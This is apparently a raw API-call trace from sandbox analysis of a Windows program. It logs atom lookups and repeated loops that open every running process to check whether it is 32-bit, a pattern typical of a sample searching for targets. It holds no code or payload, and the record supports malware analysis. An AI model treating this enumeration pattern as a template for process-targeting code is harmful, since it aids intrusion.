	[0116.641] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.641] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.641] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.641] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.642] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.642] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.642] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.642] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.642] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.642] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.643] CloseHandle (hObject=0x698) returned 1
	[0116.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.643] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.643] CloseHandle (hObject=0x698) returned 1
	[0116.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.643] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.643] CloseHandle (hObject=0x698) returned 1
	[0116.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.643] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.643] CloseHandle (hObject=0x698) returned 1
	[0116.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.678] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.678] CloseHandle (hObject=0x698) returned 1
	[0116.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.679] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.679] CloseHandle (hObject=0x698) returned 1
	[0116.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.679] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.679] CloseHandle (hObject=0x698) returned 1
	[0116.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.679] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.679] CloseHandle (hObject=0x698) returned 1
	[0116.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.679] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.679] CloseHandle (hObject=0x698) returned 1
	[0116.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.680] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.680] CloseHandle (hObject=0x698) returned 1
	[0116.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.680] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.680] CloseHandle (hObject=0x698) returned 1
	[0116.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.680] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.680] CloseHandle (hObject=0x698) returned 1
	[0116.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.680] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.680] CloseHandle (hObject=0x698) returned 1
	[0116.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.681] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.681] CloseHandle (hObject=0x698) returned 1
	[0116.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.681] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.681] CloseHandle (hObject=0x698) returned 1
	[0116.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.681] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.681] CloseHandle (hObject=0x698) returned 1
	[0116.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.681] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.681] CloseHandle (hObject=0x698) returned 1
	[0116.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.682] CloseHandle (hObject=0x698) returned 1
	[0116.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.682] CloseHandle (hObject=0x698) returned 1
	[0116.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.682] CloseHandle (hObject=0x698) returned 1
	[0116.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.682] CloseHandle (hObject=0x698) returned 1
	[0116.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.682] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.682] CloseHandle (hObject=0x698) returned 1
	[0116.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.683] CloseHandle (hObject=0x698) returned 1
	[0116.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.683] CloseHandle (hObject=0x698) returned 1
	[0116.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.683] CloseHandle (hObject=0x698) returned 1
	[0116.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.683] CloseHandle (hObject=0x698) returned 1
	[0116.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.683] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.683] CloseHandle (hObject=0x698) returned 1
	[0116.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.684] CloseHandle (hObject=0x698) returned 1
	[0116.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.684] CloseHandle (hObject=0x698) returned 1
	[0116.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.684] CloseHandle (hObject=0x698) returned 1
	[0116.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.684] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.684] CloseHandle (hObject=0x698) returned 1
	[0116.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.685] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.685] CloseHandle (hObject=0x698) returned 1
	[0116.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.685] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.685] CloseHandle (hObject=0x698) returned 1
	[0116.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.685] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.685] CloseHandle (hObject=0x698) returned 1
	[0116.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.685] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.685] CloseHandle (hObject=0x698) returned 1
	[0116.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.686] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.689] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.689] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.689] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.689] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.689] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.690] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.690] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.690] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.690] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.690] CloseHandle (hObject=0x698) returned 1
	[0116.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.690] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.690] CloseHandle (hObject=0x698) returned 1
	[0116.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.690] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.690] CloseHandle (hObject=0x698) returned 1
	[0116.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.691] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.691] CloseHandle (hObject=0x698) returned 1
	[0116.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.727] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.727] CloseHandle (hObject=0x698) returned 1
	[0116.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.728] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.728] CloseHandle (hObject=0x698) returned 1
	[0116.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.728] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.728] CloseHandle (hObject=0x698) returned 1
	[0116.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.729] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.729] CloseHandle (hObject=0x698) returned 1
	[0116.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.729] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.729] CloseHandle (hObject=0x698) returned 1
	[0116.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.729] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.729] CloseHandle (hObject=0x698) returned 1
	[0116.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.729] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.729] CloseHandle (hObject=0x698) returned 1
	[0116.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.729] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.729] CloseHandle (hObject=0x698) returned 1
	[0116.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.730] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.730] CloseHandle (hObject=0x698) returned 1
	[0116.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.730] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.730] CloseHandle (hObject=0x698) returned 1
	[0116.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.730] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.730] CloseHandle (hObject=0x698) returned 1
	[0116.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.730] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.730] CloseHandle (hObject=0x698) returned 1
	[0116.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.731] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.731] CloseHandle (hObject=0x698) returned 1
	[0116.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.731] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.731] CloseHandle (hObject=0x698) returned 1
	[0116.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.731] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.731] CloseHandle (hObject=0x698) returned 1
	[0116.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.731] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.731] CloseHandle (hObject=0x698) returned 1
	[0116.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.731] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.731] CloseHandle (hObject=0x698) returned 1
	[0116.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.732] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.732] CloseHandle (hObject=0x698) returned 1
	[0116.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.732] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.732] CloseHandle (hObject=0x698) returned 1
	[0116.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.732] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.732] CloseHandle (hObject=0x698) returned 1
	[0116.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.732] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.732] CloseHandle (hObject=0x698) returned 1
	[0116.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.733] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.733] CloseHandle (hObject=0x698) returned 1
	[0116.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.733] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.733] CloseHandle (hObject=0x698) returned 1
	[0116.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.733] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.733] CloseHandle (hObject=0x698) returned 1
	[0116.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.733] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.733] CloseHandle (hObject=0x698) returned 1
	[0116.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.733] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.733] CloseHandle (hObject=0x698) returned 1
	[0116.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.734] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.734] CloseHandle (hObject=0x698) returned 1
	[0116.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.734] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.734] CloseHandle (hObject=0x698) returned 1
	[0116.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.734] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.734] CloseHandle (hObject=0x698) returned 1
	[0116.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.734] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.734] CloseHandle (hObject=0x698) returned 1
	[0116.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.734] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.734] CloseHandle (hObject=0x698) returned 1
	[0116.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.735] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.735] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.735] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.735] wsprintfA (in: param_1=0x3993498, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.735] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.736] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.737] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.737] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.738] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.738] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.738] CloseHandle (hObject=0x698) returned 1
	[0116.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.738] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.738] CloseHandle (hObject=0x698) returned 1
	[0116.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.738] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.738] CloseHandle (hObject=0x698) returned 1
	[0116.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.738] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
